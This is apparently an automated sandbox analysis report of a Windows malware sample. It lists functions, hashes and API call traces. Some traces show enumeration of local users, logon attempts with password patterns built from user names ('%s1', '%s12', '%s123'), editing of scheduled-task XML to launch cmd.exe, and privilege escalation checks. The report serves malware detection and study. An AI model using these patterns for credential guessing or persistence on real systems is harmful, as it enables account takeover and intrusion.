                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e42fcb3eab6dfdb7d92a05da4ca5687e3eaacf820ae962d547ea67b0616ab27e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FD12572E0021A8FCB18CF99C9815AEFBF2FF98310F24952AD855AB744D774AD01CB94
                                                                                                                                                                                                                    Function 00406B60 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                                    • Instruction ID: 661d4224e0226a62dc5565bcde94e6aa946e1ef99945e038f73d7b47cfba27f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7917371D01215AFDB50EFA5C840B9EB7B5AF88304F26847EE805B7381D738AD11CBA8
                                                                                                                                                                                                                    Function 0044BFE3 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                                    • Instruction ID: b8886794a6e5007edff55ecb8f40356a68830081a2fd7a3c661494ca94f11cdd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1581C5319893918BC795DF38C8D56D6BBB1EE4322432E85DDC8940EA03E22F651BDF51
                                                                                                                                                                                                                    Function 0043A6D0 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 031776b64819325f8bc44260e121548c68ef4edaa7e8b27829c2e6f5598c06c9
                                                                                                                                                                                                                    • Instruction ID: 74367e3e6ab0b74d7f5c1cf3bcaa0d89af6e6a6e1ec9fa16ff19e2e679a1abb2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 031776b64819325f8bc44260e121548c68ef4edaa7e8b27829c2e6f5598c06c9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5551C633F219214BF348CA79CC8415A73D3EBCE31071AC27AD901D7295E974E96396C5
                                                                                                                                                                                                                    Function 0040DDA0 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 90413d9f9a7a2a51136cfd3257986b2c0b32359f2b68ce7d43070aef4feff374
                                                                                                                                                                                                                    • Instruction ID: 6b590965bade377d4829cb5edd661b89940232f3d33fb21e100e917a0d425a21
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90413d9f9a7a2a51136cfd3257986b2c0b32359f2b68ce7d43070aef4feff374
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6518E7190D3928BD311CF29C48066BFBE1AFD9314F048A6EF8C4A7351D7788A49CB96
                                                                                                                                                                                                                    Function 0043A4F0 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f940f7e9c8dad2819d7ac41217777f41bdb57ab302bde7adc409946197b50135
                                                                                                                                                                                                                    • Instruction ID: e5d6b1d35e3d87a4e74f21fc64f62253c0a3e01d769b06703654ef7c4b1d687f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f940f7e9c8dad2819d7ac41217777f41bdb57ab302bde7adc409946197b50135
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F941C377E51A3947F3188949CD81754AA52ABCC324F2B83B5CD2C6B316D8B9ED039AD0
                                                                                                                                                                                                                    Function 0040DFC0 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: a9bc7354a3e354d1b015df0f8da07e1055657b15d563b5e6f57843a172319e40
                                                                                                                                                                                                                    • Instruction ID: d8d0adafabcbd5d708f1da50a49402fb3bf4ae1d939e6727f3124d8f61b49aed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9bc7354a3e354d1b015df0f8da07e1055657b15d563b5e6f57843a172319e40
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED51A17150C3A18BD315CF2AC48066BBBE1BBC9314F048E6EE8D497351D778DA09CB96
                                                                                                                                                                                                                    Function 0042CF60 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f20fa1024a9688b10060da5d67fc074633dd4eaa16d4fe3a3c2409f5f1f9c4f6
                                                                                                                                                                                                                    • Instruction ID: c0d06c3b42bc6b51c97fcab68d65b60e5fd230549ea87696981b9f88f0129265
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f20fa1024a9688b10060da5d67fc074633dd4eaa16d4fe3a3c2409f5f1f9c4f6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00214F339748B601E7504B718D586227BD2CFCB206FAF81B5D644C7992D63ED4029564
                                                                                                                                                                                                                    Function 0040DA50 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: e9c930fd42fec790c80e573c3d74de70e79dd5c7963e19442b8978de89fab75a
                                                                                                                                                                                                                    • Instruction ID: 83a3f7d0e66a37bb7e6fdedb80276840f88715c9868f56da058082779efa7e5d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9c930fd42fec790c80e573c3d74de70e79dd5c7963e19442b8978de89fab75a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2101C92BB7CE0E45C51940AC1424A6A11801B127657D4063BAAC7F83D5EFEDD86FD84F
                                                                                                                                                                                                                    Function 00412FF0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 81f8b4470660630fa8e642daca3cb37112d29c707e5c6907703c9fc4351451dd
                                                                                                                                                                                                                    • Instruction ID: b04785f1e362cafcd50622ec6ea8703a75b25b73c25fc77f3c2a0d59776fd131
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81f8b4470660630fa8e642daca3cb37112d29c707e5c6907703c9fc4351451dd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B01F7B19053189FEB20CF94DD8579BBBF4FB01305F40809DE98D93240C3755644CB96
                                                                                                                                                                                                                    Function 00406800 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                                    • Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40
                                                                                                                                                                                                                    Function 00403579 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292memoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035AB
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035F7
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035FE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403616
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00403630
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403653
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040366A
                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040367E
                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004036D3
                                                                                                                                                                                                                    • wcsstr.MSVCRT ref: 004036F2
                                                                                                                                                                                                                    • wcsstr.MSVCRT ref: 00403725
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004037BB
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004037EC
                                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000), ref: 004037F3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004037FA
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0040382B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403887
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040388A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403897
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040389A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038AD
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038B0
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038BD
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038C0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                                    • String ID: 00-->$<Actions $p=Dv
                                                                                                                                                                                                                    • API String ID: 3028510665-2653830224
                                                                                                                                                                                                                    • Opcode ID: 955b91e7d97598c02b1fd98b2500fdb02c6b2481e78ce23fabddc674594c4510
                                                                                                                                                                                                                    • Instruction ID: 60e659956de6826fb5c9e3504b81639812d481b549725b71a5a6ffd7b5f9c5d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 955b91e7d97598c02b1fd98b2500fdb02c6b2481e78ce23fabddc674594c4510
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1CEB2504311ABC720DF64CC48F5B7BA8EFC8751F048669FA45EB291D774EA04CBA8
                                                                                                                                                                                                                    Function 00402F30 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 436commemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,?,?,76D6DB30), ref: 00402F40
                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00402F60
                                                                                                                                                                                                                    • CoCreateInstance.OLE32(004043F0,00000000,00000001,004041E0,?), ref: 00402F87
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00402F9F
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00402FBA
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00402FD8
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00402FF6
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040307C
                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?), ref: 00403082
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00403088
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040308E
                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(004035B6), ref: 004030CD
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00404EEC), ref: 00403276
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040329B
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004032B9
                                                                                                                                                                                                                      • Part of subcall function 00402E50: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004030A1,00404ED8), ref: 00402E58
                                                                                                                                                                                                                      • Part of subcall function 00402E50: HeapAlloc.KERNEL32(00000000,?,004030A1,00404ED8), ref: 00402E5F
                                                                                                                                                                                                                      • Part of subcall function 00402E50: SysAllocString.OLEAUT32(004030A1), ref: 00402E80
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00403366
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040336C
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00403372
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$ClearInit$Alloc$CreateHeapInitializeString$DecrementFileInstanceInterlockedMappingProcessSecurity
                                                                                                                                                                                                                    • String ID: cmd.exe$p=Dv
                                                                                                                                                                                                                    • API String ID: 3029307448-1819144570
                                                                                                                                                                                                                    • Opcode ID: ce624a195721d34df8c0ff0fb2f0b689a1a1700c9ed8d61842eb4ad22ab92356
                                                                                                                                                                                                                    • Instruction ID: 9e23888bed06d8ec6237e29dc82f696ab5e76098d001fcea0e973b2596c5eb93
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce624a195721d34df8c0ff0fb2f0b689a1a1700c9ed8d61842eb4ad22ab92356
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64F10875E002199FCB00DFA8C884A9EBBB9FF88710F1581AAE914BB351D774AD01CF94
                                                                                                                                                                                                                    Function 00401D80 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 169threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,76D6DB30), ref: 00401DA6
                                                                                                                                                                                                                    • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,76D6DB30), ref: 00401DC2
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 00401E08
                                                                                                                                                                                                                    • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401E19
                                                                                                                                                                                                                    • NetApiBufferFree.NETAPI32(?), ref: 00401E3A
                                                                                                                                                                                                                    • NetApiBufferFree.NETAPI32(?), ref: 00401E45
                                                                                                                                                                                                                      • Part of subcall function 004017F0: memset.MSVCRT ref: 0040181B
                                                                                                                                                                                                                      • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75C25430,00000000,?), ref: 00401833
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040185D
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 00401860
                                                                                                                                                                                                                      • Part of subcall function 004017F0: memset.MSVCRT ref: 00401873
                                                                                                                                                                                                                      • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401898
                                                                                                                                                                                                                      • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004018AC
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004018CA
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                                      • Part of subcall function 004017F0: memset.MSVCRT ref: 004018DD
                                                                                                                                                                                                                      • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401E65,000000FF,00000000,00000000), ref: 004018FF
                                                                                                                                                                                                                      • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401913
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401933
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 0040193A
                                                                                                                                                                                                                      • Part of subcall function 004017F0: memset.MSVCRT ref: 0040194A
                                                                                                                                                                                                                      • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401967
                                                                                                                                                                                                                      • Part of subcall function 004017F0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040199B
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,?), ref: 004019AD
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019B6
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,?), ref: 004019C2
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 004019C5
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019D2
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019D5
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 00401EAA
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019DE
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 004019E1
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00401E65), ref: 004019F1
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019F4
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00401E65), ref: 00401A01
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 00401A04
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 00401EEA
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 00401F26
                                                                                                                                                                                                                    • SwitchToThread.KERNEL32(?,?,00404D20,?,?,?), ref: 00401F6F
                                                                                                                                                                                                                    • NetApiBufferFree.NETAPI32(?), ref: 00401F95
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                                    • String ID: %s1$%s12$%s123
                                                                                                                                                                                                                    • API String ID: 1588441251-2882894844
                                                                                                                                                                                                                    • Opcode ID: 63274706b62708f42648d06670bacef668267c51d1314ddcf6f9b5beb05922d2
                                                                                                                                                                                                                    • Instruction ID: d6d119788ade0702c334ba716b850de2f597c51d849c979d1570e7f46e431759
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63274706b62708f42648d06670bacef668267c51d1314ddcf6f9b5beb05922d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5651B6B25043015BD331DB54C844EEB73A8AFD8754F000A2EFA846B2D1DB78DA48CBA6
                                                                                                                                                                                                                    Function 004027B0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 34COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalFindAtomA.KERNEL32(Fri Jun 17 05:52:09 20112,?,?,00402D7C), ref: 004027B9
                                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(Fri Jun 17 05:52:09 20112), ref: 004027CA
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 004027D6
                                                                                                                                                                                                                    • RtlAdjustPrivilege.NTDLL ref: 004027E6
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 004027EC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
